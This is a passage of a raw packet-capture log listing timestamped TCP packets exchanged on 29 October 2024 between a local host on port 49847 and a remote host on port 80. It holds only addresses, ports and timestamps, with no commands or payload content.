                                                                            Oct 29, 2024 14:11:40.313899994 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.313913107 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.313922882 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.313932896 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.313941002 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.313956022 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.313962936 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.313978910 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.313987017 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.313997984 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314008951 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314027071 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314151049 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314161062 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314169884 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314184904 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314189911 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314202070 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314208031 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314219952 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314229965 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314240932 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314248085 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314259052 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314265966 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314285040 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314296007 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314304113 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314313889 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314328909 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314335108 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314342976 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314353943 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314362049 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314378977 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314392090 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314398050 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314409971 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314420938 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314429045 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314439058 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314450979 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314460039 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314475060 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314482927 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314512014 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314523935 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314534903 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314543962 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314553976 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314564943 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314573050 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314596891 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314624071 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314661980 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314671993 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314682007 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314692974 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314701080 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314712048 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314718962 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314728022 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314740896 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314747095 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314759970 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314781904 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314831972 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314842939 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314867020 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314872026 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314882994 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314917088 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.314976931 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314987898 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.314999104 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.315010071 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.315017939 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.315032005 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.315037966 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.315047026 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.315058947 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.315067053 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.315077066 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.315088034 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.315095901 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.315123081 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.315936089 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.353116035 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.422418118 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.454988956 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455003023 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455013037 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455039978 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455050945 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455060959 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455071926 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455080986 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455106974 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455121994 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455132008 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455143929 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455153942 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455173969 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455455065 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455532074 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455543041 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455553055 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455560923 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455578089 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455585957 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455595016 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455605984 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455616951 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455626011 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455636024 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455656052 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455692053 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455703020 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455712080 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455719948 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455728054 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455741882 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455749035 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455760956 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455770016 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.455777884 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455790043 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.455813885 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456011057 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456020117 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456028938 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456038952 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456048012 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456057072 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456064939 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456077099 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456089020 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456096888 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456108093 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456116915 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456123114 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456151962 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456167936 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456185102 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456204891 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456218004 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456223965 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456233978 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456243992 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456249952 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456260920 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456276894 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456285000 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456295967 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456305027 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456312895 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456322908 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456335068 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456338882 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456357956 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456370115 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456376076 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456384897 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456394911 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456403017 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456413984 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456424952 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456433058 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456455946 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456463099 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456470966 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456482887 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456497908 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456504107 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456532955 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456557035 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456567049 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456577063 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456589937 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456597090 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456610918 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456621885 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456629992 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456656933 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456664085 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456676006 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456686020 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456705093 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456722021 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456732988 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456753969 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456820965 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456830025 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456839085 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456847906 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456856012 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456871986 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456917048 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456927061 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456937075 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456945896 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456952095 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456962109 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.456970930 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.456990004 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457186937 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457201004 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457210064 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457220078 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457235098 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457241058 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457250118 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457257032 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457263947 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457273960 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457283020 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457298040 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457307100 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457314968 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457324028 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457335949 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457340002 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457349062 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457359076 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457369089 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457376957 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457386971 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457392931 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457412958 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457427979 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457437992 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457447052 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457458973 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457469940 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457474947 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457484007 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457489967 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457501888 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457518101 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457540035 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457549095 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457559109 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457566023 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457575083 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457585096 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457593918 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457603931 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457609892 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457617998 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457645893 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457798958 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457808971 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457818031 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457828045 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457834005 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457844019 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457854033 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457859993 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457885981 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457914114 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457923889 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457932949 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457942009 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457950115 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.457959890 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.457966089 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458117008 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458126068 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458134890 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458141088 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458148003 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458158970 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458168030 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458177090 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458184958 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458195925 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458203077 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458211899 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458219051 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458230019 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458237886 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458251953 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458261967 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458271980 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458278894 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458287954 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458302021 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458307028 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458317041 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458334923 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458342075 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458352089 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458362103 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458369017 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458379030 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458391905 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458396912 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458406925 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458425045 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458431005 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458440065 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458451033 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458457947 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458467960 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458479881 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458484888 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458497047 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458518028 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458575010 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458585978 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458596945 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458604097 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458612919 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458631039 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458636045 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458646059 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458658934 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458668947 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.458676100 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.458693027 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.459528923 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459548950 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459558964 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459578991 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.459598064 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.459638119 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459649086 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459659100 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459670067 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459681034 CET8049847185.215.113.16192.168.2.7
                                                                            Oct 29, 2024 14:11:40.459687948 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.459712982 CET4984780192.168.2.7185.215.113.16
                                                                            Oct 29, 2024 14:11:40.460058928 CET8049847185.215.113.16192.168.2.7
